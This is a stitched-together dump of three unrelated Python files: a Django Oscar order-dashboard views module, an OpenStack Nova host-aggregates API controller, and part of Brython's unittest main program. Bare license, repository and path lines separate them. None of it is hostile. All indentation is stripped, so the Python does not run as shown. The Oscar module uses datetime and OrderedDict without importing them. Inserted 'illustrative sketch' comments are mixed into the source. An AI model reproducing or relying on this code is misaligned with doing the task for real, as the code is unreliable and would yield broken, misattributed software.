from decimal import Decimal as D
from decimal import InvalidOperation
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db.models import Q, Count, Sum, fields
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView, UpdateView
from oscar.apps.order import exceptions as order_exceptions
from oscar.apps.payment.exceptions import PaymentError
from oscar.core.compat import UnicodeCSVWriter
from oscar.core.loading import get_class, get_model
from oscar.core.utils import datetime_combine, format_datetime
from oscar.views import sort_queryset
from oscar.views.generic import BulkEditMixin
Partner = get_model('partner', 'Partner')
Transaction = get_model('payment', 'Transaction')
SourceType = get_model('payment', 'SourceType')
Order = get_model('order', 'Order')
OrderNote = get_model('order', 'OrderNote')
ShippingAddress = get_model('order', 'ShippingAddress')
Line = get_model('order', 'Line')
ShippingEventType = get_model('order', 'ShippingEventType')
PaymentEventType = get_model('order', 'PaymentEventType')
EventHandler = get_class('order.processing', 'EventHandler')
OrderStatsForm = get_class('dashboard.orders.forms', 'OrderStatsForm')
OrderSearchForm = get_class('dashboard.orders.forms', 'OrderSearchForm')
OrderNoteForm = get_class('dashboard.orders.forms', 'OrderNoteForm')
ShippingAddressForm = get_class(
'dashboard.orders.forms', 'ShippingAddressForm')
OrderStatusForm = get_class('dashboard.orders.forms', 'OrderStatusForm')
def queryset_orders_for_user(user):
"""
Returns a queryset of all orders that a user is allowed to access.
A staff user may access all orders.
To allow access to an order for a non-staff user, at least one line's
partner has to have the user in the partner's list.
"""
queryset = Order._default_manager.select_related(
'billing_address', 'billing_address__country',
'shipping_address', 'shipping_address__country',
'user'
).prefetch_related('lines')
if user.is_staff:
return queryset
else:
partners = Partner._default_manager.filter(users=user)
return queryset.filter(lines__partner__in=partners).distinct()
def get_order_for_user_or_404(user, number):
try:
return queryset_orders_for_user(user).get(number=number)
except ObjectDoesNotExist:
raise Http404()
class OrderStatsView(FormView):
"""
Dashboard view for order statistics.
Supports the permission-based dashboard.
"""
template_name = 'dashboard/orders/statistics.html'
form_class = OrderStatsForm
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def form_valid(self, form):
ctx = self.get_context_data(form=form,
filters=form.get_filters())
return self.render_to_response(ctx)
def get_form_kwargs(self):
kwargs = super(OrderStatsView, self).get_form_kwargs()
kwargs['data'] = self.request.GET
return kwargs
def get_context_data(self, **kwargs):
ctx = super(OrderStatsView, self).get_context_data(**kwargs)
filters = kwargs.get('filters', {})
ctx.update(self.get_stats(filters))
ctx['title'] = kwargs['form'].get_filter_description()
return ctx
def get_stats(self, filters):
orders = queryset_orders_for_user(self.request.user).filter(**filters)
stats = {
'total_orders': orders.count(),
'total_lines': Line.objects.filter(order__in=orders).count(),
'total_revenue': orders.aggregate(
Sum('total_incl_tax'))['total_incl_tax__sum'] or D('0.00'),
'order_status_breakdown': orders.order_by('status').values(
'status').annotate(freq=Count('id'))
}
return stats
class OrderListView(BulkEditMixin, ListView):
"""
Dashboard view for a list of orders.
Supports the permission-based dashboard.
"""
model = Order
context_object_name = 'orders'
template_name = 'dashboard/orders/order_list.html'
form_class = OrderSearchForm
paginate_by = settings.OSCAR_DASHBOARD_ITEMS_PER_PAGE
actions = ('download_selected_orders', 'change_order_statuses')
def dispatch(self, request, *args, **kwargs):
# base_queryset is equal to all orders the user is allowed to access
self.base_queryset = queryset_orders_for_user(
request.user).order_by('-date_placed')
return super(OrderListView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
if 'order_number' in request.GET and request.GET.get(
'response_format', 'html') == 'html':
# Redirect to Order detail page if valid order number is given
try:
order = self.base_queryset.get(
number=request.GET['order_number'])
except Order.DoesNotExist:
pass
else:
return redirect(
'dashboard:order-detail', number=order.number)
return super(OrderListView, self).get(request, *args, **kwargs)
def get_queryset(self): # noqa (too complex (19))
"""
Build the queryset for this list.
"""
queryset = sort_queryset(self.base_queryset, self.request,
['number', 'total_incl_tax'])
# Look for shortcut query filters
if 'order_status' in self.request.GET:
self.form = self.form_class()
status = self.request.GET['order_status']
if status.lower() == 'none':
status = None
return self.base_queryset.filter(status=status)
if 'order_number' not in self.request.GET:
self.form = self.form_class()
return queryset
self.form = self.form_class(self.request.GET)
if not self.form.is_valid():
return queryset
data = self.form.cleaned_data
if data['order_number']:
queryset = self.base_queryset.filter(
number__istartswith=data['order_number'])
if data['name']:
# If the value is two words, then assume they are first name and
# last name
parts = data['name'].split()
allow_anon = getattr(settings, 'OSCAR_ALLOW_ANON_CHECKOUT', False)
if len(parts) == 1:
parts = [data['name'], data['name']]
else:
parts = [parts[0], ' '.join(parts[1:])]
filter = Q(user__first_name__istartswith=parts[0])
filter |= Q(user__last_name__istartswith=parts[1])
if allow_anon:
filter |= Q(billing_address__first_name__istartswith=parts[0])
filter |= Q(shipping_address__first_name__istartswith=parts[0])
filter |= Q(billing_address__last_name__istartswith=parts[1])
filter |= Q(shipping_address__last_name__istartswith=parts[1])
queryset = queryset.filter(filter).distinct()
if data['product_title']:
queryset = queryset.filter(
lines__title__istartswith=data['product_title']).distinct()
if data['upc']:
queryset = queryset.filter(lines__upc=data['upc'])
if data['partner_sku']:
queryset = queryset.filter(lines__partner_sku=data['partner_sku'])
if data['date_from'] and data['date_to']:
date_to = datetime_combine(data['date_to'], datetime.time.max)
date_from = datetime_combine(data['date_from'], datetime.time.min)
queryset = queryset.filter(
date_placed__gte=date_from, date_placed__lt=date_to)
elif data['date_from']:
date_from = datetime_combine(data['date_from'], datetime.time.min)
queryset = queryset.filter(date_placed__gte=date_from)
elif data['date_to']:
date_to = datetime_combine(data['date_to'], datetime.time.max)
queryset = queryset.filter(date_placed__lt=date_to)
if data['voucher']:
queryset = queryset.filter(
discounts__voucher_code=data['voucher']).distinct()
if data['payment_method']:
queryset = queryset.filter(
sources__source_type__code=data['payment_method']).distinct()
if data['status']:
queryset = queryset.filter(status=data['status'])
return queryset
def get_search_filter_descriptions(self): # noqa (too complex (19))
"""Describe the filters used in the search.
These are user-facing messages describing what filters
were used to filter orders in the search query.
Returns:
list of unicode messages
"""
descriptions = []
# Attempt to retrieve data from the submitted form
# If the form hasn't been submitted, then `cleaned_data`
# won't be set, so default to None.
data = getattr(self.form, 'cleaned_data', None)
if data is None:
return descriptions
if data.get('order_number'):
descriptions.append(
_('Order number starts with "{order_number}"').format(
order_number=data['order_number']
)
)
if data.get('name'):
descriptions.append(
_('Customer name matches "{customer_name}"').format(
customer_name=data['name']
)
)
if data.get('product_title'):
descriptions.append(
_('Product name matches "{product_name}"').format(
product_name=data['product_title']
)
)
if data.get('upc'):
descriptions.append(
# Translators: "UPC" means "universal product code" and it is
# used to uniquely identify a product in an online store.
# "Item" in this context means an item in an order placed
# in an online store.
_('Includes an item with UPC "{upc}"').format(
upc=data['upc']
)
)
if data.get('partner_sku'):
descriptions.append(
# Translators: "SKU" means "stock keeping unit" and is used to
# identify products that can be shipped from an online store.
# A "partner" is a company that ships items to users who
# buy things in an online store.
_('Includes an item with partner SKU "{partner_sku}"').format(
partner_sku=data['partner_sku']
)
)
if data.get('date_from') and data.get('date_to'):
descriptions.append(
# Translators: This string refers to orders in an online
# store that were made within a particular date range.
_('Placed between {start_date} and {end_date}').format(
start_date=data['date_from'],
end_date=data['date_to']
)
)
elif data.get('date_from'):
descriptions.append(
# Translators: This string refers to orders in an online store
# that were made after a particular date.
_('Placed after {start_date}').format(
start_date=data['date_from'])
)
elif data.get('date_to'):
end_date = data['date_to'] + datetime.timedelta(days=1)
descriptions.append(
# Translators: This string refers to orders in an online store
# that were made before a particular date.
_('Placed before {end_date}').format(end_date=end_date)
)
if data.get('voucher'):
descriptions.append(
# Translators: A "voucher" is a coupon that can be applied to
# an order in an online store in order to receive a discount.
# The voucher "code" is a string that users can enter to
# receive the discount.
_('Used voucher code "{voucher_code}"').format(
voucher_code=data['voucher'])
)
if data.get('payment_method'):
payment_type = SourceType.objects.get(code=data['payment_method'])
descriptions.append(
# Translators: A payment method is a way of paying for an
# item in an online store. For example, a user can pay
# with a credit card or PayPal.
_('Paid using {payment_method}').format(
payment_method=payment_type.name
)
)
if data.get('status'):
descriptions.append(
# Translators: This string refers to an order in an
# online store. Some examples of order status are
# "purchased", "cancelled", or "refunded".
_('Order status is {order_status}').format(
order_status=data['status'])
)
return descriptions
def get_context_data(self, **kwargs):
ctx = super(OrderListView, self).get_context_data(**kwargs)
ctx['form'] = self.form
ctx['order_statuses'] = Order.all_statuses()
ctx['search_filters'] = self.get_search_filter_descriptions()
return ctx
def is_csv_download(self):
return self.request.GET.get('response_format', None) == 'csv'
def get_paginate_by(self, queryset):
return None if self.is_csv_download() else self.paginate_by
def render_to_response(self, context, **response_kwargs):
if self.is_csv_download():
return self.download_selected_orders(
self.request,
context['object_list'])
return super(OrderListView, self).render_to_response(
context, **response_kwargs)
def get_download_filename(self, request):
return 'orders.csv'
def download_selected_orders(self, request, orders):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s' \
% self.get_download_filename(request)
writer = UnicodeCSVWriter(open_file=response)
meta_data = (('number', _('Order number')),
('value', _('Order value')),
('date', _('Date of purchase')),
('num_items', _('Number of items')),
('status', _('Order status')),
('customer', _('Customer email address')),
('shipping_address_name', _('Deliver to name')),
('billing_address_name', _('Bill to name')),
)
columns = OrderedDict()
for k, v in meta_data:
columns[k] = v
writer.writerow(columns.values())
for order in orders:
row = columns.copy()
row['number'] = order.number
row['value'] = order.total_incl_tax
row['date'] = format_datetime(order.date_placed, 'DATETIME_FORMAT')
row['num_items'] = order.num_items
row['status'] = order.status
row['customer'] = order.email
if order.shipping_address:
row['shipping_address_name'] = order.shipping_address.name
else:
row['shipping_address_name'] = ''
if order.billing_address:
row['billing_address_name'] = order.billing_address.name
else:
row['billing_address_name'] = ''
writer.writerow(row.values())
return response
def change_order_statuses(self, request, orders):
for order in orders:
self.change_order_status(request, order)
return redirect('dashboard:order-list')
def change_order_status(self, request, order):
# This method is pretty similar to what
# OrderDetailView.change_order_status does. Ripe for refactoring.
new_status = request.POST['new_status'].strip()
if not new_status:
messages.error(request, _("The new status '%s' is not valid")
% new_status)
elif new_status not in order.available_statuses():
messages.error(request, _("The new status '%s' is not valid for"
" this order") % new_status)
else:
handler = EventHandler(request.user)
old_status = order.status
try:
handler.handle_order_status_change(order, new_status)
except PaymentError as e:
messages.error(request, _("Unable to change order status due"
" to payment error: %s") % e)
else:
msg = _("Order status changed from '%(old_status)s' to"
" '%(new_status)s'") % {'old_status': old_status,
'new_status': new_status}
messages.info(request, msg)
order.notes.create(
user=request.user, message=msg, note_type=OrderNote.SYSTEM)
class OrderDetailView(DetailView):
"""
Dashboard view to display a single order.
Supports the permission-based dashboard.
"""
model = Order
context_object_name = 'order'
template_name = 'dashboard/orders/order_detail.html'
# These strings are method names that are allowed to be called from a
# submitted form.
order_actions = ('save_note', 'delete_note', 'change_order_status',
'create_order_payment_event')
line_actions = ('change_line_statuses', 'create_shipping_event',
'create_payment_event')
def get_object(self, queryset=None):
return get_order_for_user_or_404(
self.request.user, self.kwargs['number'])
def post(self, request, *args, **kwargs):
# For POST requests, we use a dynamic dispatch technique where a
# parameter specifies what we're trying to do with the form submission.
# We distinguish between order-level actions and line-level actions.
order = self.object = self.get_object()
# Look for order-level action first
if 'order_action' in request.POST:
return self.handle_order_action(
request, order, request.POST['order_action'])
# Look for line-level action
if 'line_action' in request.POST:
return self.handle_line_action(
request, order, request.POST['line_action'])
return self.reload_page(error=_("No valid action submitted"))
def handle_order_action(self, request, order, action):
if action not in self.order_actions:
return self.reload_page(error=_("Invalid action"))
return getattr(self, action)(request, order)
def handle_line_action(self, request, order, action):
if action not in self.line_actions:
return self.reload_page(error=_("Invalid action"))
# Load requested lines
line_ids = request.POST.getlist('selected_line')
if len(line_ids) == 0:
return self.reload_page(error=_(
"You must select some lines to act on"))
lines = order.lines.filter(id__in=line_ids)
if len(line_ids) != len(lines):
return self.reload_page(error=_("Invalid lines requested"))
# Build list of line quantities
line_quantities = []
for line in lines:
qty = request.POST.get('selected_line_qty_%s' % line.id)
try:
qty = int(qty)
except ValueError:
qty = None
if qty is None or qty <= 0:
error_msg = _("The entered quantity for line #%s is not valid")
return self.reload_page(error=error_msg % line.id)
elif qty > line.quantity:
error_msg = _(
"The entered quantity for line #%(line_id)s "
"should not be higher than %(quantity)s")
kwargs = {'line_id': line.id, 'quantity': line.quantity}
return self.reload_page(error=error_msg % kwargs)
line_quantities.append(qty)
return getattr(self, action)(
request, order, lines, line_quantities)
def reload_page(self, fragment=None, error=None):
url = reverse('dashboard:order-detail',
kwargs={'number': self.object.number})
if fragment:
url += '#' + fragment
if error:
messages.error(self.request, error)
return HttpResponseRedirect(url)
def get_context_data(self, **kwargs):
ctx = super(OrderDetailView, self).get_context_data(**kwargs)
ctx['active_tab'] = kwargs.get('active_tab', 'lines')
# Forms
ctx['note_form'] = self.get_order_note_form()
ctx['order_status_form'] = self.get_order_status_form()
ctx['line_statuses'] = Line.all_statuses()
ctx['shipping_event_types'] = ShippingEventType.objects.all()
ctx['payment_event_types'] = PaymentEventType.objects.all()
ctx['payment_transactions'] = self.get_payment_transactions()
return ctx
# Data fetching methods for template context
def get_payment_transactions(self):
return Transaction.objects.filter(
source__order=self.object)
def get_order_note_form(self):
kwargs = {
'order': self.object,
'user': self.request.user,
'data': None
}
if self.request.method == 'POST':
kwargs['data'] = self.request.POST
note_id = self.kwargs.get('note_id', None)
if note_id:
note = get_object_or_404(OrderNote, order=self.object, id=note_id)
if note.is_editable():
kwargs['instance'] = note
return OrderNoteForm(**kwargs)
def get_order_status_form(self):
data = None
if self.request.method == 'POST':
data = self.request.POST
return OrderStatusForm(order=self.object, data=data)
# Order-level actions
def save_note(self, request, order):
form = self.get_order_note_form()
if form.is_valid():
form.save()
messages.success(self.request, _("Note saved"))
return self.reload_page(fragment='notes')
ctx = self.get_context_data(note_form=form, active_tab='notes')
return self.render_to_response(ctx)
def delete_note(self, request, order):
try:
note = order.notes.get(id=request.POST.get('note_id', None))
except ObjectDoesNotExist:
messages.error(request, _("Note cannot be deleted"))
else:
messages.info(request, _("Note deleted"))
note.delete()
return self.reload_page()
def change_order_status(self, request, order):
form = self.get_order_status_form()
if not form.is_valid():
return self.reload_page(error=_("Invalid form submission"))
old_status, new_status = order.status, form.cleaned_data['new_status']
handler = EventHandler(request.user)
success_msg = _(
"Order status changed from '%(old_status)s' to "
"'%(new_status)s'") % {'old_status': old_status,
'new_status': new_status}
try:
handler.handle_order_status_change(
order, new_status, note_msg=success_msg)
except PaymentError as e:
messages.error(
request, _("Unable to change order status due to "
"payment error: %s") % e)
except order_exceptions.InvalidOrderStatus as e:
# The form should validate against this, so we should only end up
# here during race conditions.
messages.error(
request, _("Unable to change order status as the requested "
"new status is not valid"))
else:
messages.info(request, success_msg)
return self.reload_page()
def create_order_payment_event(self, request, order):
"""
Create a payment event for the whole order
"""
amount_str = request.POST.get('amount', None)
try:
amount = D(amount_str)
except InvalidOperation:
messages.error(request, _("Please choose a valid amount"))
return self.reload_page()
return self._create_payment_event(request, order, amount)
# Line-level actions
def change_line_statuses(self, request, order, lines, quantities):
new_status = request.POST['new_status'].strip()
if not new_status:
messages.error(request, _("The new status '%s' is not valid")
% new_status)
return self.reload_page()
errors = []
for line in lines:
if new_status not in line.available_statuses():
errors.append(_("'%(status)s' is not a valid new status for"
" line %(line_id)d") % {'status': new_status,
'line_id': line.id})
if errors:
messages.error(request, "\n".join(errors))
return self.reload_page()
msgs = []
for line in lines:
msg = _("Status of line #%(line_id)d changed from '%(old_status)s'"
" to '%(new_status)s'") % {'line_id': line.id,
'old_status': line.status,
'new_status': new_status}
msgs.append(msg)
line.set_status(new_status)
message = "\n".join(msgs)
messages.info(request, message)
order.notes.create(user=request.user, message=message,
note_type=OrderNote.SYSTEM)
return self.reload_page()
def create_shipping_event(self, request, order, lines, quantities):
code = request.POST['shipping_event_type']
try:
event_type = ShippingEventType._default_manager.get(code=code)
except ShippingEventType.DoesNotExist:
messages.error(request, _("The event type '%s' is not valid")
% code)
return self.reload_page()
reference = request.POST.get('reference', None)
try:
EventHandler().handle_shipping_event(order, event_type, lines,
quantities,
reference=reference)
except order_exceptions.InvalidShippingEvent as e:
messages.error(request,
_("Unable to create shipping event: %s") % e)
except order_exceptions.InvalidStatus as e:
messages.error(request,
_("Unable to create shipping event: %s") % e)
except PaymentError as e:
messages.error(request, _("Unable to create shipping event due to"
" payment error: %s") % e)
else:
messages.success(request, _("Shipping event created"))
return self.reload_page()
def create_payment_event(self, request, order, lines, quantities):
"""
Create a payment event for a subset of order lines
"""
amount_str = request.POST.get('amount', None)
# If no amount passed, then we add up the total of the selected lines
if not amount_str:
amount = sum([line.line_price_incl_tax for line in lines])
else:
try:
amount = D(amount_str)
except InvalidOperation:
messages.error(request, _("Please choose a valid amount"))
return self.reload_page()
return self._create_payment_event(request, order, amount, lines,
quantities)
def _create_payment_event(self, request, order, amount, lines=None,
quantities=None):
code = request.POST.get('payment_event_type')
try:
event_type = PaymentEventType._default_manager.get(code=code)
except PaymentEventType.DoesNotExist:
messages.error(
request, _("The event type '%s' is not valid") % code)
return self.reload_page()
try:
EventHandler().handle_payment_event(
order, event_type, amount, lines, quantities)
except PaymentError as e:
messages.error(request, _("Unable to create payment event due to"
" payment error: %s") % e)
except order_exceptions.InvalidPaymentEvent as e:
messages.error(
request, _("Unable to create payment event: %s") % e)
else:
messages.info(request, _("Payment event created"))
return self.reload_page()
class LineDetailView(DetailView):
"""
Dashboard view to show a single line of an order.
Supports the permission-based dashboard.
"""
model = Line
context_object_name = 'line'
template_name = 'dashboard/orders/line_detail.html'
def get_object(self, queryset=None):
order = get_order_for_user_or_404(self.request.user,
self.kwargs['number'])
try:
return order.lines.get(pk=self.kwargs['line_id'])
except self.model.DoesNotExist:
raise Http404()
def get_context_data(self, **kwargs):
ctx = super(LineDetailView, self).get_context_data(**kwargs)
ctx['order'] = self.object.order
return ctx
def get_changes_between_models(model1, model2, excludes=None):
"""
Return a dict of differences between two model instances
"""
if excludes is None:
excludes = []
changes = {}
for field in model1._meta.fields:
if (isinstance(field, (fields.AutoField,
fields.related.RelatedField))
or field.name in excludes):
continue
if field.value_from_object(model1) != field.value_from_object(model2):
changes[field.verbose_name] = (field.value_from_object(model1),
field.value_from_object(model2))
return changes
def get_change_summary(model1, model2):
"""
Generate a summary of the changes between two address models
"""
changes = get_changes_between_models(model1, model2, ['search_text'])
change_descriptions = []
for field, delta in changes.items():
change_descriptions.append(_("%(field)s changed from '%(old_value)s'"
" to '%(new_value)s'")
% {'field': field,
'old_value': delta[0],
'new_value': delta[1]})
return "\n".join(change_descriptions)
class ShippingAddressUpdateView(UpdateView):
"""
Dashboard view to update an order's shipping address.
Supports the permission-based dashboard.
"""
model = ShippingAddress
context_object_name = 'address'
template_name = 'dashboard/orders/shippingaddress_form.html'
form_class = ShippingAddressForm
def get_object(self, queryset=None):
order = get_order_for_user_or_404(self.request.user,
self.kwargs['number'])
return get_object_or_404(self.model, order=order)
def get_context_data(self, **kwargs):
ctx = super(ShippingAddressUpdateView, self).get_context_data(**kwargs)
ctx['order'] = self.object.order
return ctx
def form_valid(self, form):
old_address = ShippingAddress.objects.get(id=self.object.id)
response = super(ShippingAddressUpdateView, self).form_valid(form)
changes = get_change_summary(old_address, self.object)
if changes:
msg = _("Delivery address updated:\n%s") % changes
self.object.order.notes.create(user=self.request.user, message=msg,
note_type=OrderNote.SYSTEM)
return response
def get_success_url(self):
messages.info(self.request, _("Delivery address updated"))
return reverse('dashboard:order-detail',
kwargs={'number': self.object.order.number, })
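# --- Illustrative sketch, not part of the original module ---
# get_changes_between_models()/get_change_summary() above diff two model
# instances field by field. Stripped of the Django specifics, the idea is
# (names below are illustrative only):
#
#     def diff_fields(obj_a, obj_b, field_names, excludes=()):
#         """Return {field: (old, new)} for fields whose values differ."""
#         return {
#             name: (getattr(obj_a, name), getattr(obj_b, name))
#             for name in field_names
#             if name not in excludes
#             and getattr(obj_a, name) != getattr(obj_b, name)
#         }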
|
bsd-3-clause
|
ted-gould/nova
|
nova/api/openstack/compute/aggregates.py
|
13
|
8862
|
# Copyright (c) 2012 Citrix Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Aggregate admin API extension."""
import datetime
from webob import exc
from nova.api.openstack.compute.schemas import aggregates
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova.compute import api as compute_api
from nova import exception
from nova.i18n import _
ALIAS = "os-aggregates"
authorize = extensions.os_compute_authorizer(ALIAS)
def _get_context(req):
return req.environ['nova.context']
class AggregateController(wsgi.Controller):
"""The Host Aggregates API controller for the OpenStack API."""
def __init__(self):
self.api = compute_api.AggregateAPI()
@extensions.expected_errors(())
def index(self, req):
"""Returns a list a host aggregate's id, name, availability_zone."""
context = _get_context(req)
authorize(context, action='index')
aggregates = self.api.get_aggregate_list(context)
return {'aggregates': [self._marshall_aggregate(a)['aggregate']
for a in aggregates]}
# NOTE(gmann): Returns 200 for backwards compatibility but should be 201
# as this operation completes the creation of the aggregates resource.
@extensions.expected_errors((400, 409))
@validation.schema(aggregates.create)
def create(self, req, body):
"""Creates an aggregate, given its name and
optional availability zone.
"""
context = _get_context(req)
authorize(context, action='create')
host_aggregate = body["aggregate"]
name = host_aggregate["name"]
avail_zone = host_aggregate.get("availability_zone")
try:
aggregate = self.api.create_aggregate(context, name, avail_zone)
except exception.AggregateNameExists as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
agg = self._marshall_aggregate(aggregate)
# To maintain the same API result as before the changes for returning
# nova objects were made.
del agg['aggregate']['hosts']
del agg['aggregate']['metadata']
return agg
@extensions.expected_errors(404)
def show(self, req, id):
"""Shows the details of an aggregate, hosts and metadata included."""
context = _get_context(req)
authorize(context, action='show')
try:
aggregate = self.api.get_aggregate(context, id)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
@extensions.expected_errors((400, 404, 409))
@validation.schema(aggregates.update)
def update(self, req, id, body):
"""Updates the name and/or availability_zone of given aggregate."""
context = _get_context(req)
authorize(context, action='update')
updates = body["aggregate"]
try:
aggregate = self.api.update_aggregate(context, id, updates)
except exception.AggregateNameExists as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
# NOTE(gmann): Returns 200 for backwards compatibility but should be 204
# as this operation completes the deletion of the aggregate resource and
# returns no response body.
@extensions.expected_errors((400, 404))
def delete(self, req, id):
"""Removes an aggregate by id."""
context = _get_context(req)
authorize(context, action='delete')
try:
self.api.delete_aggregate(context, id)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
# NOTE(gmann): Returns 200 for backwards compatibility but should be 202
# to represent an async API, as this API just accepts the request and asks
# the hypervisor driver to complete it asynchronously.
@extensions.expected_errors((400, 404, 409))
@wsgi.action('add_host')
@validation.schema(aggregates.add_host)
def _add_host(self, req, id, body):
"""Adds a host to the specified aggregate."""
host = body['add_host']['host']
context = _get_context(req)
authorize(context, action='add_host')
try:
aggregate = self.api.add_host_to_aggregate(context, id, host)
except (exception.AggregateNotFound,
exception.ComputeHostNotFound) as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except (exception.AggregateHostExists,
exception.InvalidAggregateAction) as e:
raise exc.HTTPConflict(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
# NOTE(gmann): Returns 200 for backwards compatibility but should be 202
# to represent an async API, as this API just accepts the request and asks
# the hypervisor driver to complete it asynchronously.
@extensions.expected_errors((400, 404, 409))
@wsgi.action('remove_host')
@validation.schema(aggregates.remove_host)
def _remove_host(self, req, id, body):
"""Removes a host from the specified aggregate."""
host = body['remove_host']['host']
context = _get_context(req)
authorize(context, action='remove_host')
try:
aggregate = self.api.remove_host_from_aggregate(context, id, host)
except (exception.AggregateNotFound, exception.AggregateHostNotFound,
exception.ComputeHostNotFound):
msg = _('Cannot remove host %(host)s in aggregate %(id)s') % {
'host': host, 'id': id}
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidAggregateAction:
msg = _('Cannot remove host %(host)s in aggregate %(id)s') % {
'host': host, 'id': id}
raise exc.HTTPConflict(explanation=msg)
return self._marshall_aggregate(aggregate)
@extensions.expected_errors((400, 404))
@wsgi.action('set_metadata')
@validation.schema(aggregates.set_metadata)
def _set_metadata(self, req, id, body):
"""Replaces the aggregate's existing metadata with new metadata."""
context = _get_context(req)
authorize(context, action='set_metadata')
metadata = body["set_metadata"]["metadata"]
try:
aggregate = self.api.update_aggregate_metadata(context,
id, metadata)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
def _marshall_aggregate(self, aggregate):
_aggregate = {}
for key, value in aggregate.items():
# NOTE(danms): The original API specified non-TZ-aware timestamps
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=None)
_aggregate[key] = value
return {"aggregate": _aggregate}
class Aggregates(extensions.V21APIExtensionBase):
"""Admin-only aggregate administration."""
name = "Aggregates"
alias = ALIAS
version = 1
def get_resources(self):
resources = [extensions.ResourceExtension(
ALIAS,
AggregateController(),
member_actions={'action': 'POST'})]
return resources
def get_controller_extensions(self):
return []
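# --- Illustrative sketch, not part of the original module ---
# Based purely on the handlers above, the request bodies this controller
# accepts look like the following (the endpoint paths are the usual
# os-aggregates routes; exact URLs are an assumption, not taken from this file):
#
#     # POST /os-aggregates                 -> create()
#     {"aggregate": {"name": "agg1", "availability_zone": "nova"}}
#
#     # POST /os-aggregates/{id}/action     -> _add_host()
#     {"add_host": {"host": "compute-01"}}
#
#     # POST /os-aggregates/{id}/action     -> _set_metadata()
#     {"set_metadata": {"metadata": {"ssd": "true"}}}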
|
apache-2.0
|
2014c2g7/c2g7
|
w2/static/Brython2.0.0-20140209-164925/Lib/unittest/main.py
|
739
|
10385
|
"""Unittest main program"""
import sys
import optparse
import os
from . import loader, runner
from .signals import installHandler
__unittest = True
FAILFAST = " -f, --failfast Stop on first failure\n"
CATCHBREAK = " -c, --catch Catch control-C and display results\n"
BUFFEROUTPUT = " -b, --buffer Buffer stdout and stderr during test runs\n"
USAGE_AS_MAIN = """\
Usage: %(progName)s [options] [tests]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s test_module - run tests from test_module
%(progName)s module.TestClass - run tests from module.TestClass
%(progName)s module.Class.test_method - run specified test method
[tests] can be a list of any number of test modules, classes and test
methods.
Alternative Usage: %(progName)s discover [options]
Options:
-v, --verbose Verbose output
%(failfast)s%(catchbreak)s%(buffer)s -s directory Directory to start discovery ('.' default)
-p pattern Pattern to match test files ('test*.py' default)
-t directory Top level directory of project (default to
start directory)
For test discovery all test modules must be importable from the top
level directory of the project.
"""
USAGE_FROM_MODULE = """\
Usage: %(progName)s [options] [test] [...]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s - run default set of tests
%(progName)s MyTestSuite - run suite 'MyTestSuite'
%(progName)s MyTestCase.testSomething - run MyTestCase.testSomething
%(progName)s MyTestCase - run all 'test*' test methods
in MyTestCase
"""
def _convert_name(name):
# on Linux / Mac OS X 'foo.PY' is not importable, but on
# Windows it is. Simpler to do a case insensitive match;
# a better check would be to check that the name is a
# valid Python module name.
if os.path.isfile(name) and name.lower().endswith('.py'):
if os.path.isabs(name):
rel_path = os.path.relpath(name, os.getcwd())
if os.path.isabs(rel_path) or rel_path.startswith(os.pardir):
return name
name = rel_path
# on Windows both '\' and '/' are used as path
# separators. Better to replace both than rely on os.path.sep
return name[:-3].replace('\\', '.').replace('/', '.')
return name
def _convert_names(names):
return [_convert_name(name) for name in names]
class TestProgram(object):
"""A command-line program that runs a set of tests; this is primarily
for making test modules conveniently executable.
"""
USAGE = USAGE_FROM_MODULE
# defaults for testing
failfast = catchbreak = buffer = progName = warnings = None
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=None, testLoader=loader.defaultTestLoader,
exit=True, verbosity=1, failfast=None, catchbreak=None,
buffer=None, warnings=None):
if isinstance(module, str):
self.module = __import__(module)
for part in module.split('.')[1:]:
self.module = getattr(self.module, part)
else:
self.module = module
if argv is None:
argv = sys.argv
self.exit = exit
self.failfast = failfast
self.catchbreak = catchbreak
self.verbosity = verbosity
self.buffer = buffer
if warnings is None and not sys.warnoptions:
# even if DeprecationWarnings are ignored by default
# print them anyway unless other warnings settings are
# specified by the warnings arg or the -W python flag
self.warnings = 'default'
else:
# here self.warnings is set either to the value passed
# to the warnings args or to None.
# If the user didn't pass a value self.warnings will
# be None. This means that the behavior is unchanged
# and depends on the values passed to -W.
self.warnings = warnings
